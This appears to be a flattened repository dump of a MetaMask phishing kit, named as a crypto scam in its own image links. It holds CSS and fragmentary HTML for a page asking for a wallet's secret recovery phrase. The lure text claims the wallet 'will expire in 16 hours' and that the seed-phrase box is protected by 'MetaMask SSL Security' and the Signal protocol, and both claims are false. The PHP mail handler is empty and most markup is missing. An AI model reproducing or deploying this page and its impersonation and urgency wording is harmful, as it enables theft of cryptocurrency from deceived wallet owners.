├── css ├── .gitignore ├── backup.css └── style.css ├── media ├── .gitignore ├── metamask.png ├── metamask logo.png ├── MetaMask_Fox.svg.png ├── 5e6010110671f79d5c96adf9_open graph.png └── MetaMask.svg ├── php ├── .gitignore └── mail-handler.php ├── backup.html └── index.html /css/.gitignore: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /media/.gitignore: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /php/.gitignore: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /media/metamask.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AymaneLk/MetaMask-Crypto-Scam-HTML-CSS-PHP/HEAD/media/metamask.png -------------------------------------------------------------------------------- /media/metamask logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AymaneLk/MetaMask-Crypto-Scam-HTML-CSS-PHP/HEAD/media/metamask logo.png -------------------------------------------------------------------------------- /media/MetaMask_Fox.svg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AymaneLk/MetaMask-Crypto-Scam-HTML-CSS-PHP/HEAD/media/MetaMask_Fox.svg.png -------------------------------------------------------------------------------- /media/5e6010110671f79d5c96adf9_open graph.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AymaneLk/MetaMask-Crypto-Scam-HTML-CSS-PHP/HEAD/media/5e6010110671f79d5c96adf9_open graph.png -------------------------------------------------------------------------------- /php/mail-handler.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /css/backup.css: -------------------------------------------------------------------------------- 1 | * { 2 | margin: 0; 3 | padding: 0; 4 | box-sizing: border-box; 5 | } 6 | 7 | html { 8 | font-family: 'Poppins', sans-serif; 9 | } 10 | 11 | body { 12 | margin: 10px 90px; 13 | } 14 | 15 | .intro-section { 16 | margin-bottom: 80px; 17 | } 18 | 19 | .intro-section img { 20 | max-width: 320px; 21 | cursor: pointer; 22 | } 23 | 24 | .form-section { 25 | display: flex; 26 | flex-direction: column; 27 | justify-content: center; 28 | align-items: center; 29 | } 30 | 31 | .form-section .form-text{ 32 | margin-bottom: 40px; 33 | } 34 | 35 | .form-section .form-text h3{ 36 | font-size: 32px; 37 | } 38 | 39 | .form-section .form-text .strong-text{ 40 | font-weight: 600; 41 | } 42 | 43 | .form-section .form-text h3, .form-section .form-text .parag-text{ 44 | margin-bottom: 20px; 45 | } 46 | 47 | .form-section .form-input textarea { 48 | width: 820px; 49 | height: 320px; 50 | font-size: 1.2em; 51 | border-radius: 10px; 52 | padding: 10px 0 0 10px; 53 | } 54 | 55 | .form-section .next-btn { 56 | margin-top: 20px; 57 | width: 120px; 58 | height: 35px; 59 | background: rgb(46, 25, 230); 60 | color: #fff; 61 | border: none; 62 | border-radius: 5px; 63 | letter-spacing: 1px; 64 | font-weight: 300; 65 | cursor: pointer; 66 | } -------------------------------------------------------------------------------- /css/style.css: -------------------------------------------------------------------------------- 1 | * { 2 | margin: 0; 3 | padding: 0; 4 | box-sizing: border-box; 5 | } 6 | 7 | html { 8 | font-family: 'Poppins', sans-serif; 9 | } 10 | 11 | body { 12 | margin: 10px 90px; 13 | } 14 | 15 | .intro-section { 16 | margin-bottom: 80px; 17 | } 18 | 19 | .intro-section img { 20 | max-width: 320px; 21 | cursor: pointer; 22 | } 23 | 24 | .form-section { 25 | display: flex; 26 | flex-direction: column; 27 | justify-content: center; 28 | align-items: center; 29 | } 30 | 31 | .form-section .form-text{ 32 | margin-bottom: 40px; 33 | } 34 | 35 | .form-section .form-text .strong-text{ 36 | font-weight: 600; 37 | } 38 | 39 | .form-section .form-text h3 { 40 | font-size: 32px; 41 | } 42 | 43 | .form-section .form-text h3, .form-section .form-text .parag-text{ 44 | margin-bottom: 20px; 45 | } 46 | 47 | .form-section .form-input div{ 48 | margin-bottom: 20px; 49 | } 50 | 51 | .form-section .form-input label { 52 | font-weight: 500; 53 | } 54 | 55 | .form-section .form-input input { 56 | width: 300px; 57 | height: 30px; 58 | outline-color: rgb(46, 25, 230); 59 | padding-left: 10px; 60 | border-radius: 10px; 61 | margin-top: 5px; 62 | } 63 | 64 | .form-section .next-btn { 65 | margin-top: 20px; 66 | width: 120px; 67 | height: 35px; 68 | background: rgb(46, 25, 230); 69 | color: #fff; 70 | border: none; 71 | border-radius: 5px; 72 | letter-spacing: 1px; 73 | font-weight: 300; 74 | cursor: pointer; 75 | } -------------------------------------------------------------------------------- /backup.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |
4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 |
20 |
21 |
27 | NEVER share your secret seed phrase AKA secret recovery phrase.
28 | This input is protected by MetaMask SSL Security
29 | by the same Signal encryption protocol that secures sensitive data before they leave your device.
30 |
19 |
20 | 26 | Dear MetaMasker, we would like to just quickly remind you 27 | that your 28 | Metamask wallet will expire in 16 hours. 29 |
30 |31 | Confirm that you use your MetaMask wallet. 32 |
33 |